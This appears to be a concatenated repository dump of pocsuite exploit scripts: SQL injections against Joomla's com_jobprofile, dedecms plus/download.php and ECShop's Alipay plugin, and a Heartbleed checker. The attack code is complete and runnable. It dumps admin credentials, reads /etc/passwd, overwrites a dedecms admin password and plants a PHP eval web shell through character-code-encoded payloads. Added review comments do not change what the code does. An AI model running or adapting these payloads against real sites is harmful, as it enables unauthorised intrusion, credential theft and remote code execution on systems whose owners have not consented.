        Returns the ``Output`` from ``parse_output``; ``result`` stays empty
        unless both delimiters are found in the response body.
        """
        result = {}
        # Injection point: the ``id`` query parameter.
        exploit='/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id='
        # The hex literals are the '$~~~$' and '***' delimiters that the regex
        # below keys on, so the leaked row can be located in the HTML.
        payload="-1+union+all+select+1,concat(0x247e7e7e24,username,0x2a2a2a,password"\
            ",0x247e7e7e24),3,4,5,6,7,8,9+from+jos_users--"
        vulurl=self.url+exploit+payload
        # Static browser-like request headers.
        httphead = {
            'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
            'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Connection':'keep-alive'
        }
        # Captures the two delimited fields. NOTE(review): not a raw string;
        # '\$' and '\*' are unknown escapes that Python keeps verbatim -- an
        # r'...' literal would state the intent and avoid the deprecation warning.
        parttern='\$~~~\$(.*)\*\*\*(.*)\$~~~\$'
        resp=req.get(url=vulurl,headers=httphead,timeout=50)
        # Cheap pre-check before running the regex.
        if '$~~~$' in resp.content:
            match=re.search(parttern,resp.content,re.M|re.I)
            if match:
                result['AdminInfo']={}
                result['AdminInfo']['Username']=match.group(1)
                result['AdminInfo']['Password']=match.group(2)
        return self.parse_output(result)

    def _verify(self):
        """Confirm the injection by reading ``/etc/passwd`` with ``load_file``.

        A ``root:...:0:0:`` line in a 200 response is taken as proof and a
        fragment of it is recorded. Presumably ``load_file`` also depends on
        the database account's file-read privilege, so a miss here does not
        prove the injection is absent. Returns the ``Output`` from
        ``parse_output``.
        """
        result = {}
        filename='/etc/passwd'
        # Hex-encoded path (Python 2 ``str.encode('hex')``; no str equivalent on 3).
        hexfilename='0x'+filename.encode('hex')
        exploit='/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id='
        payload="-1+union+all+select+1,load_file("+hexfilename+"),3,4,5,6,7,8,9+from+jos_users--"
        vulurl=self.url+exploit+payload
        # Static browser-like request headers.
        httphead = {
            'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
            'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Connection':'keep-alive'
        }
        resp=req.get(url=vulurl,headers=httphead,timeout=50)
        if resp.status_code==200:
            # Shape of the root entry in a passwd file: name, password field,
            # uid 0, gid 0, then three more colon-separated fields.
            match=re.search('root:.+?:0:0:.+?:.+?:.+?', resp.content,re.I|re.M)
            if match:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url+exploit
                result['VerifyInfo']['Payload'] = payload
                # Only the matched fragment is kept, not the whole file.
                result['Fileinfo']={}
                result['Fileinfo']['Filename']=filename
                result['Fileinfo']['Content']=match.group(0)+'...'
        return self.parse_output(result)

    def parse_output(self, result):
        """Wrap ``result`` in an ``Output``: success when non-empty, otherwise a failure."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output
110 |
111 |
112 | register(TestPOC)
--------------------------------------------------------------------------------
/dede_download.php_sqli.php.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | #!coding: utf-8
3 | import re
4 |
5 | from pocsuite.net import req
6 | from pocsuite.poc import POCBase,Output
7 | from pocsuite.utils import register
8 |
class Fuckdede(POCBase):
    """pocsuite POC for the dedecms 5.7 ``plus/download.php`` SQL injection.

    Both methods send the injected statement as decimal character codes in
    the ``arrs1[]``/``arrs2[]`` query arrays. ``_attack`` is destructive (it
    ends by fetching a file it expects to have created on the target), and
    ``_verify`` reports constant credentials, which suggests it writes too;
    see the NOTEs below. Each returns the ``Output`` built by ``parse_result``.
    """
    vulID='1'
    version = '1'
    author = ['fengxuan']
    vulDate = '2016-2-25'
    createDate = '2016-2-25'
    updateDate = '2016-2-25'
    references = ['http://www.evalshell.com', 'http://www.cnseay.com/2963/']
    name = 'dedecms plus/download.php 注入漏洞利用EXP'
    appPowerLink = 'http://www.dedecms.cn/'
    appName = 'dedecms'
    appVersion = '5.7'
    vulType = 'SQL Injection'
    desc = '''
开发人员在修补漏洞的时候只修复了少数的变量而遗漏了其他变量,使其他变量直接
带入了SQL语句中,可以通过字符来转义掉一个单引号,逃逸单引号,产生SQL注入。
此注入为报错注入,可以通过UpdateXML函数进行注入。
'''
    samples = ['']

    def _verify(self):
        """Send the probe and report success on the 'Safe Alert ... step 2!' marker.

        NOTE(review): the username/password put into the result are constants,
        not values read back from the target. Decoding the ``arrs2[]`` codes
        suggests the statement is an UPDATE of the admin row, i.e. this
        "verify" is not a passive check -- confirm before running it against
        anything you do not own.
        """
        result = {}
        target = self.url + "/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=120&arrs2[]=117&arrs2[]=97&arrs2[]=110&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35"
        response = req.get(target)
        content = response.content
        # The 'Safe Alert' text in the body is taken as the success signal
        # (``> 0`` would also miss a marker at offset 0, harmless for HTML).
        if content.find('Safe Alert: Request Error step 2!') > 0:
            result = {'VerifyInfo':{}}
            result['VerifyInfo']['URL'] = self.url
            result['VerifyInfo']['username'] = 'xuan'
            result['VerifyInfo']['password'] = 'admin'
        return self.parse_result(result)

    def _attack(self):
        """Three-request chain ending in a GET of ``/plus/x.php`` reported as a shell.

        1. the injected statement via ``download.php`` (response ignored),
        2. ``ad_js.php?aid=1`` (response ignored; presumably renders what was
           stored), 3. ``/plus/x.php``, whose body decides the result.
        NOTE(review): ``str.find`` returns -1 when 'w' is absent and -1 is
        truthy, so the success branch runs for nearly any response body; as
        written the check cannot tell a created file from a 404 page.
        """
        result = {}
        target = self.url + '/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=97&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=32&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=61&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=64&arrs2[]=102&arrs2[]=111&arrs2[]=112&arrs2[]=101&arrs2[]=110&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=120&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=97&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=64&arrs2[]=102&arrs2[]=119&arrs2[]=114&arrs2[]=105&arrs2[]=116&arrs2[]=101&arrs2[]=40&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=44&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=119&arrs2[]=93&arrs2[]=41&arrs2[]=32&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=102&arrs2[]=117&arrs2[]=99&arrs2[]=107&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=39&arrs2[]=39&arrs2[]=59&arrs2[]=64&arrs2[]=102&arrs2[]=99&arrs2[]=108&arrs2[]=111&arrs2[]=115&arrs2[]=101&arrs2[]=40&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=32&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35'
        req.get(target)
        req.get(self.url + '/plus/ad_js.php?aid=1&nocache=1')
        shell = req.get(self.url + '/plus/x.php')
        # NOTE(review): see the docstring -- this condition is almost always true.
        if shell.content.find('w'):
            result = {'VerifyInfo':{}}
            result['VerifyInfo']['shell'] = self.url + '/plus/x.php'
            result['VerifyInfo']['password'] = 'w'
        return self.parse_result(result)

    def parse_result(self, result):
        """Wrap ``result`` in an ``Output``: success when non-empty, otherwise a failure."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail("Internet Nothing returned")
        return output
60 |
61 | register(Fuckdede)
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
--------------------------------------------------------------------------------
/ECShop支付宝插件SQL注入漏洞.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | import re
4 | import urllib
5 |
6 | from pocsuite.net import req
7 | from pocsuite.poc import POCBase, Output
8 | from pocsuite.utils import register
9 |
10 |
class TestPOC(POCBase):
    """pocsuite POC for an error-based SQL injection in ECShop's Alipay
    ``respond.php`` handler (``out_trade_no`` parameter).

    ``_verify`` looks for md5(123456) echoed back inside a MySQL
    duplicate-entry error; ``_attack`` first recovers the table prefix and
    then reads one row of ``<prefix>_admin_user`` the same way. Both return
    an ``Output`` from ``parse_attack`` -- except when an exception is
    caught, see the NOTEs on each method. Python 2 code (``urllib.quote``).
    """
    vulID = 'SSV-60643'
    version = '1'
    author = '0x153'
    vulDate = '2013-02-22'
    createDate = '2015-10-15'
    updateDate = '2015-10-15'
    references = ['http://www.sebug.net/vuldb/ssvid-60643','http://www.tuicool.com/articles/vauaMz','http://www.waitalone.cn/ecshop-alipay-plug-injected-exp.html']
    name = 'ECShop支持宝插件SQL注入漏洞'
    appPowerLink = 'www.ecshop.com'
    appName = 'ECShop'
    appVersion = '2.7.3'
    vulType = 'SQL Injection'
    desc = '''
ECShop支持宝插件SQL注入漏洞
'''

    samples = ['']

    '''
获取标准url
@param url 需要转化的url
'''
    def get_standard_url(self,data,url):
        """Append ``data`` to ``url``, adding ``http://`` and a ``/`` separator as needed.

        ``data`` is percent-encoded with ``urllib.quote``; the safe set keeps
        the SQL/URL punctuation of the payload untouched. ``self`` is unused.
        """
        # NOTE(review): this is a substring test, not a scheme check -- a bare
        # host whose path happens to contain "http" is treated as already
        # carrying a scheme.
        if url.count("http") != 0:
            if url[-1] == '/': #http://www.xxoo.com/
                url = "%s%s" % (url,urllib.quote(data,"?@`[]*,+()/'&=!_%"))
            else: #http://www.xxoo.com
                url = "%s/%s" % (url,urllib.quote(data,"?@`[]*,+()/'&=!_%"))
        else:
            if url[-1] == '/': #www.xxoo.com/club/
                url = "http://%s%s" % (url,urllib.quote(data,"?@`[]*,+()/'&=!_%"))
            else: #www.xxoo.com/club
                url = "http://%s/%s" % (url,urllib.quote(data,"?@`[]*,+()/'&=!_%"))
        return url

    '''
获取表前缀
@param url 目标主机的url
'''
    def get_table_pre(self,url):
        """Recover the ECShop table prefix, or ``None`` if it cannot be read.

        Uses the rand()/group-by duplicate-entry trick: the leaked table name
        lands in a "Duplicate entry '...'" error in the page. The trick is
        non-deterministic, hence the ten attempts (the author's note below).
        """
        data = "respond.php?code=alipay&subject=0&out_trade_no=%00' union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(table_name) from information_schema.tables where table_schema=database() limit 1))a from information_schema.tables group by a)b%23"
        url = self.get_standard_url(data,url)

        # The leaked value sits between the floor(rand(0)*2) digit and the
        # closing quote. NOTE(review): ``[0,1]`` is a character class that also
        # matches a comma; ``[01]`` is what was probably meant.
        pattern = re.compile(r"Duplicate entry '[0,1]?(.+?)[0,1]?'")

        '''
使用这种注入方式存在一定不确定性,需要多循环几次
'''
        for i in range(10):
            r = req.get(url)
            ret = pattern.findall(r.content)
            if ret:
                if ret[0].count('ecs') != 0:
                    return 'ecs'
                else:
                    # Prefix = everything before the first underscore.
                    # NOTE(review): str.index raises ValueError when there is
                    # no underscore; the only reason this does not crash the
                    # caller is _attack's catch-all except.
                    return ret[0][0:ret[0].index('_')]
        return None

    '''
注入攻击代码
@param url 目标主机的url
@param count 爆数据的参数,default=0
@param table_pre 数据库表前缀
'''
    def _attack(self):
        """Read one ``<prefix>_admin_user`` row (user_name, password) and report it.

        Returns the ``Output`` from ``parse_attack``. NOTE(review): the bare
        ``except:`` below prints the traceback and then falls off the end, so
        any error -- a network failure included -- makes this return ``None``
        rather than an ``Output``.
        """
        try:
            result ={}
            table_pre = self.get_table_pre(self.url)
            if table_pre is None:
                return self.parse_attack(result)
            # Same duplicate-entry trick; CHAR(126)x3 and CHAR(124)x3 are the
            # '~~~' and '|||' delimiters the regex below extracts.
            data = "respond.php?code=alipay&subject=0&out_trade_no=%00' union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(CHAR(126),CHAR(126),CHAR(126),user_name,CHAR(124),CHAR(124),CHAR(124),password,CHAR(126),CHAR(126),CHAR(126)) from {table_pre}_admin_user limit 1))a from information_schema.tables group by a)b%23".format(table_pre=table_pre)
            url = self.get_standard_url(data,self.url)

            pattern = re.compile(r"~~~(\w+?)\|\|\|(\w+?)~~~")

            # Retried for the same non-determinism as get_table_pre.
            for i in range(10):
                r = req.get(url)
                # NOTE(review): if ``req`` is requests-like, r.encoding can be
                # None, which makes decode() raise and trips the bare except.
                re_result = pattern.findall(r.content.decode(r.encoding))
                if re_result:
                    result['AdminInfo'] = {}
                    result['AdminInfo']['Username'] = re_result[0][0]
                    result['AdminInfo']['Password'] = re_result[0][1]
                    return self.parse_attack(result)
            return self.parse_attack(result)
        except:
            import traceback
            traceback.print_exc()

    def _verify(self, verify=True):
        """Check for the injection: md5(123456) must show up in a duplicate-entry error.

        ``verify`` is accepted for interface compatibility and not used.
        NOTE(review): as in ``_attack``, the bare ``except:`` turns any error
        into a printed traceback and a ``None`` return.
        """
        try:
            result = {}
            payload = "/respond.php?code=alipay&subject=0&out_trade_no=%00' union select 1 from (select count(*),concat(floor(rand()*2),(select md5(123456)))a from information_schema.tables group by a)b%23"
            # NOTE(review): unlike _attack, the URL is not built through
            # get_standard_url, so self.url must already carry its scheme.
            vulurl = self.url + payload

            '''
本地测试的时候,存在不稳定的情况,
可能是MySQL的bug,使用循环减少误报
'''
            # (Author's note above: the error-based trick is flaky, hence the loop.)
            for i in range(10):
                respond = req.get(vulurl)
                # md5(123456) = e10adc3949ba59abbe56e057f20f883e
                if 'e10adc3949ba59abbe56e057f20f883e' in respond.content:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = vulurl
                    return self.parse_attack(result)
            return self.parse_attack(result)
        except:
            import traceback
            traceback.print_exc()

    def parse_attack(self, result):
        """Wrap ``result`` in an ``Output``: success when non-empty, otherwise a failure."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output
130 |
131 | register(TestPOC)
--------------------------------------------------------------------------------
/_140408_OpenSSL_102_Heartbleed.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding:utf-8 -*-
3 |
4 |
import binascii
import re
import select
import socket
import struct
import sys
import time

from pocsuite.net import req
from pocsuite.poc import Output, POCBase
from pocsuite.utils import register
14 |
15 |
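def request2bin(x):
    """Decode a whitespace-separated hex dump into raw bytes.

    Spaces and newlines are stripped first so the multi-line literals below
    can be laid out for readability. ``binascii.unhexlify`` is used instead
    of ``str.decode('hex')`` so the helper works on both Python 2 (returns
    str) and Python 3 (returns bytes); malformed input -- an odd number of
    digits or a non-hex character -- raises ``binascii.Error``.

    Args:
        x: a string of hex digit pairs, optionally separated by spaces/newlines.

    Returns:
        The decoded bytes; an empty string decodes to an empty byte string.
    """
    return binascii.unhexlify(x.replace(' ', '').replace('\n', ''))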
18 |
19 |
# Canned TLS record sent first by main(): record type 0x16 (handshake),
# record version 0x0302 (TLS 1.1), and a handshake type byte of 0x01, which
# makes it a ClientHello -- the name "client_key_exchange" is misleading.
# main() then consumes the server's records until ServerHelloDone.
client_key_exchange = request2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')
37 |
38 |
# The Heartbleed probe: a heartbeat record (type 0x18 = 24, the value
# send_n_catch_heartbeat matches on) declaring 3 bytes of content, whose
# heartbeat request claims a payload length of 0x4000 with no payload bytes
# behind it. A server that honours the claimed length answers with a
# heartbeat record; a server that checks it presumably answers with an alert.
malformed_heartbeat = request2bin('''
18 03 02 00 03
01 40 00
''')
43 |
44 |
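def get_msg_from_socket(some_socket, msg_length, time_out=5):
    """Read exactly ``msg_length`` bytes from ``some_socket`` within ``time_out`` seconds.

    Args:
        some_socket: a connected stream socket.
        msg_length: number of bytes to collect.
        time_out: overall deadline in seconds for the whole read, not per chunk.

    Returns:
        The ``msg_length`` bytes read, or ``None`` if the deadline passes or
        the peer closes the connection first. A zero or negative
        ``msg_length`` returns an empty byte string without touching the socket.
    """
    end_time = time.time() + time_out
    received_data = b''
    remaining_msg = msg_length

    while remaining_msg > 0:
        read_time = end_time - time.time()
        if read_time < 0:
            return None
        # Wait only for what is left of the deadline; waiting the full
        # time_out on every round let the call overrun its own deadline.
        readable, _, _ = select.select([some_socket], [], [], read_time)
        if some_socket not in readable:
            continue
        data = some_socket.recv(remaining_msg)
        if not data:
            # Peer closed the connection before the message was complete.
            return None
        received_data += data
        remaining_msg -= len(data)

    return received_data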
76 |
77 |
def recv_msg(a_socket):
    """Read one TLS-style record: a 5-byte header, then a body of the declared length.

    Returns ``(content_type, version, payload)``, or ``(None, None, None)``
    when either read times out or the connection closes first.
    """
    absent = (None, None, None)

    hdr = get_msg_from_socket(a_socket, 5)
    if hdr is None:
        return absent

    # Big-endian: 1-byte content type, 2-byte version, 2-byte body length.
    ctype, version, body_len = struct.unpack('>BHH', hdr)

    body = get_msg_from_socket(a_socket, body_len, 10)
    if body is None:
        return absent

    return ctype, version, body
92 |
93 |
def send_n_catch_heartbeat(our_socket):
    """Send the oversized heartbeat request and classify the server's reply.

    Returns True when the server answers with a heartbeat record (content
    type 24) -- it accepted the bogus length, which is the Heartbleed
    signal -- and False on an alert record (21) or when the read times out
    or the connection closes. Records of any other type are skipped and the
    loop keeps reading. Only the record type is inspected; the payload is
    never examined, so this is a presence check, not a memory dump.
    NOTE(review): ``socket.send`` may send fewer bytes than given; ``sendall``
    is the usual choice for a whole record.
    """
    our_socket.send(malformed_heartbeat)

    while True:
        content_type, content_version, content_payload = recv_msg(our_socket)

        # None means timeout or closed connection (see recv_msg).
        if content_type is None:
            return False

        # Heartbeat response: the peer processed the malformed request.
        if content_type == 24:
            return True

        # Alert: the peer rejected it.
        if content_type == 21:
            return False
110 |
111 |
def main(rhost):
    """Run the heartbeat check against ``rhost`` and return what ``send_n_catch_heartbeat`` returns.

    ``rhost`` is sliced blindly with ``rhost[8:]`` and then split on ':',
    so it is expected as an 8-character prefix (e.g. ``https://``) followed
    by ``ip:port`` -- TODO confirm the scheme the caller passes, a shorter
    prefix would corrupt the host. Returns ``None`` when the handshake
    never reaches the ServerHelloDone record.
    NOTE(review): the socket is never closed on any path (no try/finally).
    """
    local_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ip, port = rhost[8:].split(':')
    local_socket.connect((ip, int(port)))
    # Send the canned ClientHello and consume records until a handshake
    # record (22) whose first body byte is 0x0E (ServerHelloDone) arrives.
    local_socket.send(client_key_exchange)

    while True:
        # NOTE(review): ``type`` shadows the builtin. ``ord(payload[0])`` is
        # Python 2 code (payload is a str); on 3 it would raise TypeError.
        type, version, payload = recv_msg(local_socket)
        if not type:
            return
        if type == 22 and ord(payload[0]) == 0x0E:
            break

    # NOTE(review): the probe is sent here and again inside
    # send_n_catch_heartbeat, so it goes out twice.
    local_socket.send(malformed_heartbeat)
    return send_n_catch_heartbeat(local_socket)
128 |
129 |
class TestPOC(POCBase):
    """pocsuite wrapper around ``main``: one probe per URL, reported as pass/fail."""
    vulID = '1219'
    version = '1'
    author = 'zhangl'
    vulDate = '2014-04-08'
    createDate = '2014-04-08'
    updateDate = '2014-04-08'
    references = ['http://drops.wooyun.org/papers/1381']
    name = 'Openssl 1.0.1 内存读取 信息泄露漏洞'
    appPowerLink = 'https://www.openssl.org/'
    appName = 'OpenSSL'
    appVersion = '1.0.1~1.0.1f, 1.0.2-beta, 1.0.2-beta1'
    vulType = 'Information Disclosure'
    desc = '''
OpenSSL是一个强大的安全套接字层密码库。
这次漏洞被称为OpenSSL“心脏出血”漏洞,这是关于 OpenSSL 的信息泄漏漏洞导致的安全问题。它使攻击者能够从内存中读取最多64 KB的数据。
安全人员表示:无需任何特权信息或身份验证,我们就可以从我们自己的(测试机上)偷来X.509证书的私钥、用户名与密码、聊天工具的消息、电子邮件以及重要的商业文档和通信等数据。
'''
    # Sample targets used when exercising the POC (none configured).
    samples = ['']

    def _verify(self):
        """Probe ``self.url`` once via ``main`` and wrap the result in an Output."""
        return self.parse_attack(main(self.url))

    def _attack(self):
        """Attack mode performs the same single probe as verify mode."""
        return self._verify()

    def parse_attack(self, response):
        """Build the Output: success (with the URL) on a truthy ``response``, else a failure."""
        output = Output(self)
        if not response:
            output.fail('Fail test')
            return output
        output.success({'VerifyInfo': {'URL': '%s' % self.url}})
        return output
171 |
172 |
173 | register(TestPOC)
--------------------------------------------------------------------------------